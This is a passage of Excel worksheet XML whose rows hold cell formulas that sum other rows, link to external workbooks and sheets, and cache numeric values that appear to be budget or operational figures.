        <v>8.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]22'!$R$72</f>
        <v>330.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]22'!$S$72</f>
        <v>4398.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'21'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'21'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]22'!$W$73</f>
        <v>65.25</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]22'!$X$73</f>
        <v>61.4276843007955</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]22'!$Y$73</f>
        <v>62.8057749901861</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]22'!$T$73</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]22'!$U$73</f>
        <v>64.0473484848485</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]22'!$V$73</f>
        <v>53.0709269662921</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]22'!$Q$73</f>
        <v>8.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]22'!$R$73</f>
        <v>338.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]22'!$S$73</f>
        <v>4534.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'21'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'21'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]22'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]22'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]22'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]22'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]22'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]22'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]22'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]22'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]22'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'21'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'21'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]22'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]22'!$X$74</f>
        <v>216.933333333333</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]22'!$Y$74</f>
        <v>221.877060119306</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]22'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]22'!$U$74</f>
        <v>11.3636363636364</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]22'!$V$74</f>
        <v>7.27914325842697</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]22'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]22'!$R$74</f>
        <v>60</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]22'!$S$74</f>
        <v>621.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'21'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'21'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]22'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]22'!$X$72</f>
        <v>9.99999999999999e-6</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]22'!$Y$72</f>
        <v>9.14600550964187e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]22'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]22'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]22'!$V$72</f>
        <v>4.24859550561798e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]22'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]22'!$R$72</f>
        <v>2.2e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]22'!$S$72</f>
        <v>0.000363</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'21'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'21'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]22'!$W$73</f>
        <v>201.299991612501</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]22'!$X$73</f>
        <v>160.897078747754</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]22'!$Y$73</f>
        <v>238.416163350503</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]22'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]22'!$U$73</f>
        <v>12.4829587121212</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]22'!$V$73</f>
        <v>68.4414836493446</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]22'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]22'!$R$73</f>
        <v>65.910022</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]22'!$S$73</f>
        <v>5847.640363</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]22'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]22'!$E$22</f>
        <v>9272</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'21'!H21</f>
        <v>160369</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2269807</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]22'!$I$22</f>
        <v>8286.95</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'21'!K21</f>
        <v>177292.95</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2243746.95</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]22'!$L$22</f>
        <v>66129.36</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>140.700765957447</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]22'!$W$81</f>
        <v>274</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]22'!$X$81</f>
        <v>280.603268063836</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]22'!$Y$81</f>
        <v>275.934424994555</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]22'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]22'!$U$81</f>
        <v>29.8071338383838</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]22'!$V$81</f>
        <v>35.734375</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]22'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]22'!$R$81</f>
        <v>157.381666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]22'!$S$81</f>
        <v>3053.145</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]22'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]22'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'21'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]22'!$I$17</f>
        <v>7599</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'21'!K22</f>
        <v>147184.87</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2038646.25</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]22'!$L$17</f>
        <v>105441.482</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>52.720741</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]22'!$W$79</f>
        <v>102.875</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]22'!$X$79</f>
        <v>101.281824611033</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]22'!$Y$79</f>
        <v>102.19388241861</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]22'!$T$79</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]22'!$U$79</f>
        <v>49.989898989899</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]22'!$V$79</f>
        <v>45.6636886183937</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]22'!$Q$79</f>
        <v>8</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]22'!$R$79</f>
        <v>263.946666666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]22'!$S$79</f>
        <v>3901.50555555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]22'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]22'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'21'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]22'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'21'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]22'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]22'!$W$80</f>
        <v>79.1666666666667</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]22'!$X$80</f>
        <v>83.9206959878819</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]22'!$Y$80</f>
        <v>79.4478425041139</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]22'!$T$80</f>
        <v>100</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]22'!$U$80</f>
        <v>35.3214962121212</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]22'!$V$80</f>
        <v>32.6703339575531</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]22'!$Q$80</f>
        <v>24</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]22'!$R$80</f>
        <v>186.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]22'!$S$80</f>
        <v>2791.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]22'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]22'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'21'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]22'!$I$56</f>
        <v>0</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'21'!K24</f>
        <v>29813.09</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>309639.62</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]22'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]22'!$R$6</f>
        <v>94.125</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]22'!$S$6</f>
        <v>85.7243248669812</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]22'!$T$6</f>
        <v>86.1318791386122</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]22'!$O$6</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]22'!$P$6</f>
        <v>56.5965909090909</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]22'!$Q$6</f>
        <v>52.5836844569288</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]22'!$L$6</f>
        <v>8</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]22'!$M$6</f>
        <v>298.83</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]22'!$N$6</f>
        <v>4492.75</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]22'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'21'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]22'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'21'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]22'!$R$7</f>
        <v>173.125</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]22'!$S$7</f>
        <v>194.983170947741</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]22'!$T$7</f>
        <v>188.057368119066</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]22'!$O$7</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]22'!$P$7</f>
        <v>53.4564393939394</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]22'!$Q$7</f>
        <v>50.3842462546816</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]22'!$L$7</f>
        <v>8</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]22'!$M$7</f>
        <v>282.25</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]22'!$N$7</f>
        <v>4304.83</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'21'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'21'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]22'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]22'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]22'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]22'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]22'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]22'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]22'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]22'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]22'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'21'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'21'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]22'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]22'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]22'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]22'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]22'!$U$69</f>
        <v>72.282196969697</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]22'!$V$69</f>
        <v>68.6157537453184</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]22'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]22'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]22'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'21'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'21'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]22'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]22'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]22'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]22'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]22'!$U$104</f>
        <v>43.74375</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]22'!$V$104</f>
        <v>63.097109082397</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]22'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]22'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]22'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'21'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'21'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]22'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]22'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]22'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]22'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]22'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]22'!$V$105</f>
        <v>32.8204822097378</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]22'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]22'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]22'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'21'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'21'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]22'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]22'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]22'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]22'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]22'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]22'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]22'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]22'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]22'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
